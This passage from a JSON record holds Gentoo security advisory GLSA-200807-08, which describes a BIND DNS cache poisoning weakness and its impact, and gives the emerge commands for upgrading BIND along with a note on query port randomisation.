query source ports. \n\n### Impact\n\nAn attacker could exploit this weakness to poison the cache of a recursive resolver and thus spoof DNS traffic, which could e.g. lead to the redirection of web or mail traffic to malicious sites. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll BIND users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-dns/bind-9.4.2_p1\"\n\nNote: In order to utilize the query port randomization to mitigate the weakness, you need to make sure that your network setup allows the DNS server to use random source ports for query and that you have not set a fixed query port via the \"query-source port\" directive in the BIND configuration.", "edition": 1, "modified": "2008-07-11T00:00:00", "published": "2008-07-11T00:00:00", "id": "GLSA-200807-08", "href": "https://security.gentoo.org/glsa/200807-08", "type": "gentoo", "title": "BIND: Cache poisoning", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}